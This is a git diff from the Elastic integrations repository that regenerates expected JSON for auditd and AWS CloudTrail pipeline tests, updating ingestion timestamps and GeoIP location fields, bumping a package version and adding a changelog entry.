a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json index e18aa2fc026..6e1d5056c15 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-raw.log-expected.json @@ -14,7 +14,7 @@ }, "event": { "action": "mac_ipsec_event", - "ingested": "2021-12-02T11:18:11.329098600Z", + "ingested": "2021-12-14T14:35:17.193775882Z", "original": "type=MAC_IPSEC_EVENT msg=audit(1485893834.891:18877201): op=SPD-delete auid=4294967295 ses=4294967295 res=1 src=192.168.2.0 src_prefixlen=24 dst=192.168.0.0 dst_prefixlen=16", "kind": "event", "outcome": "1" @@ -54,7 +54,7 @@ }, "event": { "action": "syscall", - "ingested": "2021-12-02T11:18:11.329123900Z", + "ingested": "2021-12-14T14:35:17.193778358Z", "original": "type=SYSCALL msg=audit(1485893834.891:18877199): arch=c000003e syscall=44 success=yes exit=184 a0=9 items=0 ppid=1240 pid=1281 auid=4294967295 uid=0 gid=0 euid=0 suid=0 fsuid=0 egid=0 sgid=0 fsgid=0 tty=(none) ses=4294967295 comm=\"charon\" exe=2F7573722F6C6962657865632F7374726F6E677377616E2F636861726F6E202864656C6574656429 key=(null)", "category": [ "process" @@ -125,7 +125,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329134900Z", + "ingested": "2021-12-14T14:35:17.193778802Z", "original": "type=USER_CMD msg=audit(1489519256.192:19600329): user pid=4151 uid=497 auid=700 ses=11988 msg='cwd=\"/\" cmd=2F7573722F6C696236342F6E6167696F732F706C7567696E732F636865636B5F617374657269736B5F7369705F7065657273202D7020323032 terminal=? res=success'", "kind": "event", "action": [ @@ -168,14 +168,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -188,7 +188,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-02T11:18:11.329142300Z", + "ingested": "2021-12-14T14:35:17.193779203Z", "original": "type=CRYPTO_SESSION msg=audit(1481077041.515:406): pid=1298 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=start direction=from-server cipher=chacha20-poly1305@openssh.com ksize=512 mac= pfs=curve25519-sha256@libssh.org spid=1299 suid=74 rport=63927 laddr=10.142.0.2 lport=22 exe=\"/usr/sbin/sshd\" hostname=? addr=89.160.20.156 terminal=? res=success'", "kind": "event", "action": [ @@ -245,7 +245,7 @@ "action": [ "typed" ], - "ingested": "2021-12-02T11:18:11.329149700Z", + "ingested": "2021-12-14T14:35:17.193779627Z", "original": "type=TTY msg=audit(1491924063.550:1065565): tty pid=27930 uid=1000 auid=1000 ses=762 major=136 minor=0 comm=\"bash\" data=65687F7F6563686F20746573740D76696D202F6574632F70616D2E642F70617373776F72642D617574682D61630D6D616E2070616D5F7474795F61756469740D6D616E2070616D2E640D76696D202F657463017375646F20052F70616D642E73797F7F7F7F7F2E7F6D2E642F7379092D6109617F2D61090D6D616E2070616D0D747F67726570207379737F7F7F2F7661722F6C6F09672F6D65097309207C20677265702070616D5F7474790D677265702070616D5F747479202F7661722F6C6F672F6D6573090D1B5B41017375646F200D7375646F2073750D", "kind": "event" }, @@ -276,7 +276,7 @@ }, "event": { "action": "proctitle", - "ingested": "2021-12-02T11:18:11.329156Z", + "ingested": "2021-12-14T14:35:17.193780007Z", "original": "type=PROCTITLE msg=audit(1451781471.394:194438): proctitle=\"bash\"", "kind": "event" }, @@ -297,7 +297,7 @@ }, "event": { "action": "proctitle", - "ingested": "2021-12-02T11:18:11.329162400Z", + "ingested": "2021-12-14T14:35:17.193780397Z", "original": "type=PROCTITLE msg=audit(1451781471.394:194440): proctitle=737368643A206275726E205B707269765D", "kind": "event" }, @@ -322,7 +322,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329168800Z", + "ingested": "2021-12-14T14:35:17.193780783Z", "original": "type=SOFTWARE_UPDATE msg=audit(1573844484.309:785): pid=3157 uid=0 auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 msg='sw=\"gcc-4.8.5-39.el7.x86_64\" sw_type=rpm key_enforce=0 gpg_res=1 root_dir=\"/\" comm=\"yum\" exe=\"/usr/bin/python2.7\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -370,7 +370,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329195Z", + "ingested": "2021-12-14T14:35:17.193781159Z", "original": "type=SYSTEM_BOOT msg=audit(1573844456.144:5): pid=678 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -409,7 +409,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329200700Z", + "ingested": "2021-12-14T14:35:17.193781560Z", "original": "type=SYSTEM_SHUTDOWN msg=audit(1573844517.054:1163): pid=4440 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -447,7 +447,7 @@ }, "event": { "action": "execve", - "ingested": "2021-12-02T11:18:11.329208400Z", + "ingested": "2021-12-14T14:35:17.193781948Z", "original": "type=EXECVE msg=audit(1581371984.206:579393): argc=1 a0=top", "kind": "event" }, @@ -470,7 +470,7 @@ "action": [ "loaded-kernel-module" ], - "ingested": "2021-12-02T11:18:11.329216Z", + "ingested": "2021-12-14T14:35:17.193782510Z", "original": "type=KERN_MODULE msg=audit(1581371984.206:579397): name=mymodule", "category": [ "driver" @@ -501,7 +501,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329229200Z", + "ingested": "2021-12-14T14:35:17.193782910Z", "original": "type=VIRT_CONTROL msg=audit(1513507481.075:145): pid=1431 uid=0 auid=100 ses=3 subj=system_u:system_r:container_runtime_t:s0 msg='user=root reason=api op=create vm=? vm-pid=? hostname=? exe=\"/usr/bin/dockerd-current\" addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -546,7 +546,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329289Z", + "ingested": "2021-12-14T14:35:17.193783354Z", "original": "type=VIRT_MACHINE_ID msg=audit(1481903143.572:23118): pid=5637 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:virtd_t:s0-s0:c0.c1023 msg='virt=kvm vm=\"rhel-work3\" uuid=5501263b-181d-47ed-ab03-a6066f3d26bf vm-ctx=system_u:system_r:svirt_t:s0:c444,c977 img-ctx=system_u:object_r:svirt_image_t:s0:c444,c977 model=selinux exe=\"/usr/sbin/libvirtd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -589,7 +589,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329294500Z", + "ingested": "2021-12-14T14:35:17.193783740Z", "original": "node=localhost.localdomain type=DAEMON_START msg=audit(1594053514.588:4686): op=start ver=2.8.5 format=raw kernel=3.10.0-1062.9.1.el7.x86_64 auid=4294967295 pid=1643 uid=0 ses=4294967295 subj=system_u:system_r:auditd_t:s0 res=success", "kind": "event", "action": [ @@ -632,7 +632,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329302400Z", + "ingested": "2021-12-14T14:35:17.193784129Z", "original": "node=localhost.localdomain type=CONFIG_CHANGE msg=audit(1594053514.707:5): audit_failure=1 old=1 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 res=1", "kind": "event", "action": [ @@ -678,7 +678,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329309800Z", + "ingested": "2021-12-14T14:35:17.193784632Z", "original": "node=localhost.localdomain type=SERVICE_START msg=audit(1594053514.709:6): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -723,7 +723,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329316600Z", + "ingested": "2021-12-14T14:35:17.193785020Z", "original": "node=localhost.localdomain type=SYSTEM_BOOT msg=audit(1594053514.725:7): pid=1667 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg=' comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -762,7 +762,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329321800Z", + "ingested": "2021-12-14T14:35:17.193785405Z", "original": "type=USER_END msg=audit(1489519230.178:19600327): user pid=4121 uid=0 auid=700 ses=11988 msg='op=PAM:session_close acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -809,7 +809,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329331Z", + "ingested": "2021-12-14T14:35:17.193785791Z", "original": "type=CRED_DISP msg=audit(1489519230.178:19600328): user pid=4121 uid=0 auid=700 ses=11988 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -856,7 +856,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329343200Z", + "ingested": "2021-12-14T14:35:17.193786175Z", "original": "type=CRED_ACQ msg=audit(1489519256.193:19600330): user pid=4151 uid=0 auid=700 ses=11988 msg='op=PAM:setcred acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -903,7 +903,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329354300Z", + "ingested": "2021-12-14T14:35:17.193786552Z", "original": "type=USER_START msg=audit(1489519256.193:19600331): user pid=4151 uid=0 auid=700 ses=11988 msg='op=PAM:session_open acct=\"root\" exe=\"/usr/bin/sudo\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -952,7 +952,7 @@ "action": [ "changed-login-id-to" ], - "ingested": "2021-12-02T11:18:11.329365200Z", + "ingested": "2021-12-14T14:35:17.193786927Z", "original": "type=LOGIN msg=audit(1489636960.072:19623791): pid=28281 uid=0 old auid=700 new auid=700 old ses=6793 new ses=12286", "category": [ "authentication" @@ -995,14 +995,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1015,7 +1015,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-02T11:18:11.329376100Z", + "ingested": "2021-12-14T14:35:17.193787432Z", "original": "type=CRYPTO_KEY_USER msg=audit(1489636960.070:19623788): user pid=28281 uid=0 auid=700 ses=6793 msg='op=destroy kind=session fp=? direction=both spid=28282 suid=74 rport=58994 laddr=89.160.20.156 lport=50022 exe=\"/usr/sbin/sshd\" hostname=? addr=89.160.20.156 terminal=? res=success'", "kind": "event", "action": [ @@ -1068,14 +1068,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1088,7 +1088,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-02T11:18:11.329383400Z", + "ingested": "2021-12-14T14:35:17.193787815Z", "original": "type=USER_AUTH msg=audit(1489636960.072:19623789): user pid=28281 uid=0 auid=700 ses=6793 msg='op=success acct=\"admin\" exe=\"/usr/sbin/sshd\" hostname=? addr=89.160.20.156 terminal=ssh res=success'", "kind": "event", "action": [ @@ -1136,7 +1136,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329391800Z", + "ingested": "2021-12-14T14:35:17.193788223Z", "original": "type=USER_ACCT msg=audit(1489636977.805:19623808): user pid=28395 uid=0 auid=700 ses=12286 msg='op=PAM:accounting acct=\"root\" exe=\"/bin/su\" hostname=? addr=? terminal=pts/0 res=success'", "kind": "event", "action": [ @@ -1185,7 +1185,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329403100Z", + "ingested": "2021-12-14T14:35:17.193788610Z", "original": "type=SERVICE_START msg=audit(1481076983.864:6): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=auditd comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1229,7 +1229,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329413800Z", + "ingested": "2021-12-14T14:35:17.193788998Z", "original": "type=SERVICE_STOP msg=audit(1481076984.534:16): pid=1 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='unit=irqbalance comm=\"systemd\" exe=\"/usr/lib/systemd/systemd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1271,7 +1271,7 @@ "action": [ "loaded-firewall-rule-to" ], - "ingested": "2021-12-02T11:18:11.329424900Z", + "ingested": "2021-12-14T14:35:17.193789391Z", "original": "type=NETFILTER_CFG msg=audit(1481076984.827:17): table=filter family=2 entries=0", "category": [ "configuration" @@ -1304,7 +1304,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329435900Z", + "ingested": "2021-12-14T14:35:17.193789780Z", "original": "type=ADD_GROUP msg=audit(1481076992.414:385): pid=1235 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-group id=1000 exe=\"/usr/sbin/groupadd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1356,7 +1356,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329442500Z", + "ingested": "2021-12-14T14:35:17.193790174Z", "original": "type=GRP_MGMT msg=audit(1481076992.419:386): pid=1235 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-shadow-group id=1000 exe=\"/usr/sbin/groupadd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1408,7 +1408,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329450500Z", + "ingested": "2021-12-14T14:35:17.193790564Z", "original": "type=ADD_USER msg=audit(1481076992.488:389): pid=1264 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-user id=1000 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1461,7 +1461,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329462800Z", + "ingested": "2021-12-14T14:35:17.193790954Z", "original": "type=SYSTEM_RUNLEVEL msg=audit(1481076992.492:390): pid=1279 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:init_t:s0 msg='old-level=N new-level=3 comm=\"systemd-update-utmp\" exe=\"/usr/lib/systemd/systemd-update-utmp\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1505,7 +1505,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329474700Z", + "ingested": "2021-12-14T14:35:17.193791342Z", "original": "type=USER_MGMT msg=audit(1481076992.521:393): pid=1264 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='op=add-home-dir id=1000 exe=\"/usr/sbin/useradd\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1557,7 +1557,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329486100Z", + "ingested": "2021-12-14T14:35:17.193791855Z", "original": "type=USYS_CONFIG msg=audit(1481076993.000:402): pid=1232 uid=0 auid=4294967295 ses=4294967295 subj=system_u:system_r:unconfined_service_t:s0 msg='changing system time exe=\"/usr/sbin/hwclock\" hostname=? addr=? terminal=? res=success'", "kind": "event", "action": [ @@ -1601,14 +1601,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1624,7 +1624,7 @@ "action": [ "changed-role-to" ], - "ingested": "2021-12-02T11:18:11.329497300Z", + "ingested": "2021-12-14T14:35:17.193792249Z", "original": "type=USER_ROLE_CHANGE msg=audit(1481077043.140:415): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='pam: default-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 selected-context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 exe=\"/usr/sbin/sshd\" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=89.160.20.156 terminal=ssh res=success'", "kind": "event", "outcome": "success" @@ -1663,14 +1663,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1683,7 +1683,7 @@ "ip": "89.160.20.156" }, "event": { - "ingested": "2021-12-02T11:18:11.329508300Z", + "ingested": "2021-12-14T14:35:17.193792648Z", "original": "type=USER_LOGIN msg=audit(1481077043.193:421): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe=\"/usr/sbin/sshd\" hostname=pool-96-241-146-97.washdc.fios.verizon.net addr=89.160.20.156 terminal=/dev/pts/0 res=success'", "kind": "event", "action": [ @@ -1733,7 +1733,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329519300Z", + "ingested": "2021-12-14T14:35:17.193793065Z", "original": "type=USER_LOGOUT msg=audit(1481077049.033:424): pid=1298 uid=0 auid=1000 ses=1 subj=system_u:system_r:sshd_t:s0-s0:c0.c1023 msg='op=login id=1000 exe=\"/usr/sbin/sshd\" hostname=? addr=? terminal=/dev/pts/0 res=success'", "kind": "event", "action": [ @@ -1778,7 +1778,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329531700Z", + "ingested": "2021-12-14T14:35:17.193793451Z", "original": "type=CONFIG_CHANGE msg=audit(1481077231.371:478): auid=1000 ses=3 subj=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 op=\"add_rule\" key=(null) list=4 res=1", "kind": "event", "action": [ @@ -1822,7 +1822,7 @@ }, "event": { "action": "cwd", - "ingested": "2021-12-02T11:18:11.329552600Z", + "ingested": "2021-12-14T14:35:17.193793832Z", "original": "type=CWD msg=audit(1481077231.371:479): cwd=\"/home/some_user\"", "kind": "event" }, @@ -1842,7 +1842,7 @@ }, "event": { "action": "path", - "ingested": "2021-12-02T11:18:11.329564300Z", + "ingested": "2021-12-14T14:35:17.193794227Z", "original": "type=PATH msg=audit(1481077231.371:479): item=0 name=\"/sbin/auditctl\" inode=17367907 dev=08:01 mode=0100750 ouid=0 ogid=0 rdev=00:00 obj=system_u:object_r:auditctl_exec_t:s0 objtype=NORMAL", "kind": "event" }, @@ -1877,7 +1877,7 @@ }, "event": { "action": "unknown[1329]", - "ingested": "2021-12-02T11:18:11.329571900Z", + "ingested": "2021-12-14T14:35:17.193794616Z", "original": "type=UNKNOWN[1329] msg=g\u0005", "kind": "event" }, @@ -1896,7 +1896,7 @@ }, "event": { "action": "bprm_fcaps", - "ingested": "2021-12-02T11:18:11.329585800Z", + "ingested": "2021-12-14T14:35:17.193794989Z", "original": "type=BPRM_FCAPS msg=audit(1481077308.360:529): fver=0 fp=0000000000000000 fi=0000000000000000 fe=0 old_pp=0000000000000000 old_pi=0000000000000000 old_pe=0000000000000000 new_pp=0000001fffffffff new_pi=0000000000000000 new_pe=0000001fffffffff", "kind": "event" }, @@ -1926,7 +1926,7 @@ }, "event": { "action": "sockaddr", - "ingested": "2021-12-02T11:18:11.329593500Z", + "ingested": "2021-12-14T14:35:17.193795393Z", "original": "type=SOCKADDR msg=audit(1481078424.953:688): saddr=02000050A9FEA9FE0000000000000000", "kind": "event" }, @@ -1947,7 +1947,7 @@ }, "event": { "action": "ckaddr", - "ingested": "2021-12-02T11:18:11.329603200Z", + "ingested": "2021-12-14T14:35:17.193795792Z", "original": "type=CKADDR msg=audit(1481078553.346:737): saddr=02000050A9FEA9FE0000000000000000", "kind": "event" }, @@ -1967,7 +1967,7 @@ "version": "1.12.0" }, "event": { - "ingested": "2021-12-02T11:18:11.329617Z", + "ingested": "2021-12-14T14:35:17.193796182Z", "original": "type=DAEMON_END msg=audit(1481078697.892:7799): auditd normal halt, sending auid=? pid=? subj=? res=success", "kind": "event", "action": [ diff --git a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json index f3212a38094..66d018dd117 100644 --- a/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json +++ b/packages/auditd/data_stream/log/_dev/test/pipeline/test-auditd-useradd.log-expected.json @@ -14,7 +14,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122698251Z", + "ingested": "2021-12-14T14:35:19.942115636Z", "original": "type=ADD_GROUP msg=audit(1610903553.686:584): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/group id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -71,7 +71,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122702082Z", + "ingested": "2021-12-14T14:35:19.942118172Z", "original": "type=ADD_GROUP msg=audit(1610903553.710:586): pid=2940 uid=0 auid=1000 ses=14 msg='op=adding group to /etc/gshadow id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -128,7 +128,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122703292Z", + "ingested": "2021-12-14T14:35:19.942118572Z", "original": "type=ADD_GROUP msg=audit(1610903553.710:587): pid=2940 uid=0 auid=1000 ses=14 msg='op= id=1004 exe=\"/usr/sbin/groupadd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -184,7 +184,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122704357Z", + "ingested": "2021-12-14T14:35:19.942118950Z", "original": "type=ADD_USER msg=audit(1610903553.730:591): pid=2945 uid=0 auid=1000 ses=14 msg='op=adding user id=1004 exe=\"/usr/sbin/useradd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -241,7 +241,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122705381Z", + "ingested": "2021-12-14T14:35:19.942119281Z", "original": "type=USER_ACCT msg=audit(1610903553.814:593): pid=2948 uid=0 auid=1000 ses=14 msg='pam_tally2 uid=1004 reset=0 exe=\"/sbin/pam_tally2\" hostname=localhost addr=127.0.0.1 terminal=/dev/pts/2 res=success'", "kind": "event", "action": [ @@ -293,7 +293,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122706355Z", + "ingested": "2021-12-14T14:35:19.942119622Z", "original": "type=USER_CHAUTHTOK msg=audit(1610903558.174:594): pid=2953 uid=0 auid=1000 ses=14 msg='op=PAM:chauthtok acct=\"charlie\" exe=\"/usr/bin/passwd\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -350,7 +350,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122707376Z", + "ingested": "2021-12-14T14:35:19.942119948Z", "original": "type=USER_AUTH msg=audit(1610903558.178:595): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:authentication acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ @@ -403,7 +403,7 @@ "ip": "127.0.0.1" }, "event": { - "ingested": "2021-11-30T10:23:47.122738488Z", + "ingested": "2021-12-14T14:35:19.942120282Z", "original": "type=USER_ACCT msg=audit(1610903558.178:596): pid=2954 uid=0 auid=1000 ses=14 msg='op=PAM:accounting acct=\"root\" exe=\"/usr/bin/chfn\" hostname=ubuntu-bionic addr=127.0.0.1 terminal=pts/2 res=success'", "kind": "event", "action": [ diff --git a/packages/auditd/manifest.yml b/packages/auditd/manifest.yml index 9aa6da84b61..73754161782 100644 --- a/packages/auditd/manifest.yml +++ b/packages/auditd/manifest.yml @@ -1,6 +1,6 @@ name: auditd title: Auditd -version: 1.3.0 +version: 1.3.1 release: ga description: Collect logs from Linux audit daemon with Elastic Agent. type: integration diff --git a/packages/aws/changelog.yml b/packages/aws/changelog.yml index 9266b854727..437eb9d9dd6 100644 --- a/packages/aws/changelog.yml +++ b/packages/aws/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "1.7.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "1.7.0" changes: - description: Add integration for AWS Network Firewall diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json index 6231a4dd28d..e9b520569fe 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-assume-role-json.log-expected.json @@ -14,20 +14,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-OXF", - "city_name": "Abingdon", + "region_iso_code": "GB-ENG", + "city_name": "London", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "Oxfordshire", + "region_name": "England", "location": { - "lon": -1.3614, - "lat": 51.7095 - } - }, - "as": { - "number": 20712, - "organization": { - "name": "Andrews \u0026 Arnold Ltd" + "lon": -0.0931, + "lat": 51.5142 } }, "address": "81.2.69.144", diff --git a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-change-password-json.log-expected.json b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-change-password-json.log-expected.json index 9dcab5261ad..6b314e7ee9e 100644 --- a/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-change-password-json.log-expected.json +++ b/packages/aws/data_stream/cloudtrail/_dev/test/pipeline/test-change-password-json.log-expected.json @@ -1,13 +1,6 @@ { "expected": [ { - "source": { - "address": "127.0.0.1", - "ip": "127.0.0.1" - }, - "tags": [ - "preserve_original_event" - ], "cloud": { "region": "us-east-1", "account": { @@ -23,6 +16,10 @@ "Alice" ] }, + "source": { + "address": "127.0.0.1", + "ip": "127.0.0.1" + }, "event": { "original": "{\"eventVersion\":\"1.05\",\"userIdentity\":{\"type\":\"IAMUser\",\"principalId\":\"0123456789012\",\"arn\":\"arn:aws:iam::0123456789012:user/Alice\",\"accountId\":\"0123456789012\",\"accessKeyId\":\"EXAMPLE_KEY\",\"userName\":\"Alice\"},\"eventTime\":\"2020-01-09T00:09:33Z\",\"eventSource\":\"iam.amazonaws.com\",\"eventName\":\"ChangePassword\",\"awsRegion\":\"us-east-1\",\"sourceIPAddress\":\"127.0.0.1\",\"userAgent\":\"aws-cli/1.16.310 Python/3.8.1 Darwin/18.7.0 botocore/1.13.46\",\"errorCode\":\"AccessDeniedException\",\"errorMessage\":\"An unknown error occurred\",\"requestParameters\":null,\"responseElements\":null,\"requestID\":\"EXAMPLE-5204-4fed-9c60-9c6EXAMPLE\",\"eventID\":\"EXAMPLE-b92f-48bb-8c4c-efeEXAMPLE\",\"eventType\":\"AwsApiCall\",\"recipientAccountId\":\"0123456789012\"}", "provider": "iam.amazonaws.com", @@ -65,16 +62,12 @@ "name": "Spider" }, "version": "1.16.310" - } - }, 